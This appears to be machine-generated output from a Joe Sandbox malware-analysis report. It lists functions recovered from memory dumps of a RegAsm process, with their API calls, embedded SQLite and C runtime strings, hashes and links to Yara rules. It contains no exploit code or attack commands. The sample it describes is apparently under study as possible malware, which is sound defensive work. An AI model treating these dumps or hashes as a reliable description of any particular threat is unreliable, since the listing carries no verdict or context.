Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prolog
String ID:
API String ID: 1158113254-0
Opcode ID: ad376ae8866a2c7cb0f5ab09607c360d28ddadc7ab7bc2ca8b04ddbcda8e53df
Instruction ID: e13e341dc4e37fbc94374f59f2af7a78e3056599aa0a0f60075e6cc9e2652744
Opcode Fuzzy Hash: ad376ae8866a2c7cb0f5ab09607c360d28ddadc7ab7bc2ca8b04ddbcda8e53df
Instruction Fuzzy Hash: 2C41C131A002069FCB24DF65ED81BEA7BE8EB18309F10543FE405E6691D7BCD6C08B59

Uniqueness

Uniqueness Score: -1.00%

Function 199D5BC1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3B494859,?,?,00000000,19A2D1CB,000000FF,?,199D5B30,?,?,199D5ADF,?), ref: 199D5BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 199D5C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,19A2D1CB,000000FF,?,199D5B30,?,?,199D5ADF,?), ref: 199D5C2A

Strings

YHI;, xrefs: 199D5BD6
mscoree.dll, xrefs: 199D5BEF
CorExitProcess, xrefs: 199D5C00

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$YHI;$mscoree.dll
API String ID: 4061214504-3552725690
Opcode ID: 104cfd7b646a24080ca7bbd8f2aae7e914ecf30d1d649c6768a4fe48e97b7efd
Instruction ID: 14c99451439312a15996c8b9926b5a9fd5d3c0be28e43ac39b8994bfc7864abc
Opcode Fuzzy Hash: 104cfd7b646a24080ca7bbd8f2aae7e914ecf30d1d649c6768a4fe48e97b7efd
Instruction Fuzzy Hash: 7E01DB31914669EFDB028FA4CC84BAEBBFCFB44710F050929F816A22C0D7799405CB90

Uniqueness

Uniqueness Score: -1.00%

Function 198D31F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc20c8dc09047b863917c20ea8f8128134a29b6839e974f132aeb8ac42ac7d3f
Instruction ID: 60739d6f69a7baf87046d33292ed7ccee9db5d3b1d2d7119bf83d255022016bb
Opcode Fuzzy Hash: bc20c8dc09047b863917c20ea8f8128134a29b6839e974f132aeb8ac42ac7d3f
Instruction Fuzzy Hash: 10F12571A043429FD705CF28D88075ABBE0BF65328F4C466FEC9A97281D736E946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19846DA0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

recursively defined fts5 content table, xrefs: 19846DE2

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: recursively defined fts5 content table
API String ID: 0-437020801
Opcode ID: 96593f08ee4bc08b7585c89c1f5d61ccc346aa55042d5df7130fb6f987fd2bea
Instruction ID: cdf5d48048f651a6b3d1adfa20476445789e781b0d48e1fe906b660b001db92d
Opcode Fuzzy Hash: 96593f08ee4bc08b7585c89c1f5d61ccc346aa55042d5df7130fb6f987fd2bea
Instruction Fuzzy Hash: 64D10575905349CFDB04CF19C480757B7E0FF99328FA8456EE8898B281D776E48ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 004196D7 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 004196E5

Part of subcall function 004180C3: __mtinitlocknum.LIBCMT ref: 004180D9
Part of subcall function 004180C3: __amsg_exit.LIBCMT ref: 004180E5
Part of subcall function 004180C3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A,?,?,00416C9B,00000000,0042A308,00416CE2,K@), ref: 004180ED

DecodePointer.KERNEL32(0042A290,00000020,00419828,00000000,00000001,00000000,?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D), ref: 00419721
DecodePointer.KERNEL32(?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A), ref: 00419732

Part of subcall function 00418CAA: EncodePointer.KERNEL32(00000000,0041C87C,0063D400,00000314,00000000,?,?,?,?,?,00419A3F,0063D400,Microsoft Visual C++ Runtime Library,00012010), ref: 00418CAC

DecodePointer.KERNEL32(-00000004,?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A), ref: 00419758
DecodePointer.KERNEL32(?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A), ref: 0041976B
DecodePointer.KERNEL32(?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A), ref: 00419775

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 26d60fc1e1d7487970be1ae3c74afe372c3d886327b81f1a05011ea4f43e310a
Instruction ID: 641049035220b12586841d40c2ba73ec3ae0c6e9ad58b3a11f25b8d1400e18c3
Opcode Fuzzy Hash: 26d60fc1e1d7487970be1ae3c74afe372c3d886327b81f1a05011ea4f43e310a
Instruction Fuzzy Hash: E131277091031ADFDF10AFA9E8546EDBBF1BF09314F14402BE424A6291DBB94D91CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004184B0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004184BC

Part of subcall function 00418E14: __getptd_noexit.LIBCMT ref: 00418E17
Part of subcall function 00418E14: __amsg_exit.LIBCMT ref: 00418E24

__amsg_exit.LIBCMT ref: 004184DC
__lock.LIBCMT ref: 004184EC
InterlockedDecrement.KERNEL32(?), ref: 00418509
_free.LIBCMT ref: 0041851C
InterlockedIncrement.KERNEL32(0042B1C0), ref: 00418534

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: c8c7d40bab74427e7612ed86395c8ba12905a639c1402f03f75e31aa81c048a8
Instruction ID: 9cd51a609155e9c26de26d2a0fff125873f278f94aff41f161ea964d547d68e9
Opcode Fuzzy Hash: c8c7d40bab74427e7612ed86395c8ba12905a639c1402f03f75e31aa81c048a8
Instruction Fuzzy Hash: D0016131A00621EBD721AB65A805BDA7761EF04768F54401FE800A7281DF3C6EC2CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0040F93B Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,0041041A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040F947
lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,00000104,?,0041041A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040F960
lstrlen.KERNEL32(00000104,?,0041041A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040F972
wsprintfA.USER32 ref: 0040F984

Strings

%s%s, xrefs: 0040F97E
C:\Users\user\Desktop\, xrefs: 0040F95A, 0040F95F

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-4107738187
Opcode ID: 6c8bcea1d6fb0e8869a490e36bf7965392f11d5c9099109b4d31fc5b04f97877
Instruction ID: 7f360261b8c393262e79215f862bbd3f352f1fd510d59be435c59fa084f67c4e
Opcode Fuzzy Hash: 6c8bcea1d6fb0e8869a490e36bf7965392f11d5c9099109b4d31fc5b04f97877
Instruction Fuzzy Hash: D8F089332002197FDB011F99AC48E9BBFAEEF59775B040029FD08A3211C77159258BE5

Uniqueness

Uniqueness Score: -1.00%

Function 1992ABF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1992AE0E
misuse, xrefs: 1992AE18
%s at line %d of [%.10s], xrefs: 1992AE1D
unable to delete/modify user-function due to active statements, xrefs: 1992AD61

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 29f1597bd3f0d479c817673ba4e1aa81f518c7e714b6f005adbf3f0539e39aae
Instruction ID: 5b78f938d9b97bd8918e9a19699a9ea307a5338d2a954d51af4e05ce0bbb3919
Opcode Fuzzy Hash: 29f1597bd3f0d479c817673ba4e1aa81f518c7e714b6f005adbf3f0539e39aae
Instruction Fuzzy Hash: 0B510372606300AFD7118E24DC80B6FB7F8EFC9755F88492DF586962D5D336D8018BA2

Uniqueness

Uniqueness Score: -1.00%

Function 1983A860 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

argument to %s() is not a valid SQL statement, xrefs: 1983A97C
stmt-pointer, xrefs: 1983A928
bytecode, xrefs: 1983A96E
tables_used, xrefs: 1983A973, 1983A97B

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
API String ID: 0-361449301
Opcode ID: 5ee0bcf0561411c8eec6358fad79cea98829a5dfa7b58c080b5431965f3d5477
Instruction ID: 40e8e9c938ac436dd46a4a1288bd36b5f38d07595ba15ecc3a5e290a9082ad96
Opcode Fuzzy Hash: 5ee0bcf0561411c8eec6358fad79cea98829a5dfa7b58c080b5431965f3d5477
Instruction Fuzzy Hash: E861E1B19007419FDB10CF28C885753B7E8EF54306F49492DE8AADA281E776EA4CCBD1

Uniqueness

Uniqueness Score: -1.00%

Function 19834CE0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 160COMMON

Download Yara Rule

Strings

YHI;, xrefs: 198C3F33
temp, xrefs: 198C3F91
wrong number of vtable arguments, xrefs: 198C3FA9

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: YHI;$temp$wrong number of vtable arguments
API String ID: 0-3331964440
Opcode ID: dfa723b382e76a260125e05aa00110e02320c225ea8e61e393307fde04f468e6
Instruction ID: 2248300386dcf43b5e2b074a9b89054ed77a047b348e0dde533a87a9c5f9b02d
Opcode Fuzzy Hash: dfa723b382e76a260125e05aa00110e02320c225ea8e61e393307fde04f468e6
Instruction Fuzzy Hash: 6951C5B55043458FC714CF28D8405AABBF1BF99704F488A6EE48697741D332E68ACF96

Uniqueness

Uniqueness Score: -1.00%

Function 1994BF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

fts5 expression tree is too large (maximum depth %d), xrefs: 1994C070
NEAR, xrefs: 1994C03A
phrase, xrefs: 1994C035, 1994C042
fts5: %s queries are not supported (detail!=full), xrefs: 1994C043

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: 0e5f8357014686a72825f87863272aa1ec7531f113d41040a57f50a38b0d834d
Instruction ID: 995503ffaba7289142b9b25c3aad1b982518ca824a328dba8ef82c6d4349936a
Opcode Fuzzy Hash: 0e5f8357014686a72825f87863272aa1ec7531f113d41040a57f50a38b0d834d
Instruction Fuzzy Hash: 8041E531E002559FDB17DE24CA80B9EB3E8EF84314F39856DE88947291F776E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1986F490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1986F4B0
unable to delete/modify collation sequence due to active statements, xrefs: 1986F533
misuse, xrefs: 1986F4BA
%s at line %d of [%.10s], xrefs: 1986F4BF

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-3348720253
Opcode ID: f63c7eda97ac9c25ad95d8b048da450b716613d6d333af8abf92afccfa1ef28c
Instruction ID: 84572d764b17094ccdbfe9dc51c9622243b15733b3dd96aa363dc60ff5721613
Opcode Fuzzy Hash: f63c7eda97ac9c25ad95d8b048da450b716613d6d333af8abf92afccfa1ef28c
Instruction Fuzzy Hash: 334115726043409BD700CF28EC84BAAB7E4EF91325F5C456EF5549F2D2E336E9158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 19854C00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

temp, xrefs: 19854C3E
CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN), xrefs: 19854CCB
invalid arguments to fts4aux constructor, xrefs: 19854C9E

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN)$invalid arguments to fts4aux constructor$temp
API String ID: 0-537686372
Opcode ID: 55fdfc199ab2c85e8e4ec38d9d907c4f1377fbefffbcdc178d9a849e4ed31f7f
Instruction ID: d4d2ace6330323e99c8a1ddb105889b0c0426ab0e661e1085b9c0d7757240dc8
Opcode Fuzzy Hash: 55fdfc199ab2c85e8e4ec38d9d907c4f1377fbefffbcdc178d9a849e4ed31f7f
Instruction Fuzzy Hash: 9A413B752002419FD7048F2CD880AA67BF1EF95724F1C84ADECE68B242D632ED09DB60

Uniqueness

Uniqueness Score: -1.00%

Function 199B8850 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

YHI;, xrefs: 199B8856
delayed %dms for lock/sharing conflict at line %d, xrefs: 199B895F
os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 199B88E2

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: YHI;$delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
API String ID: 0-1048546852
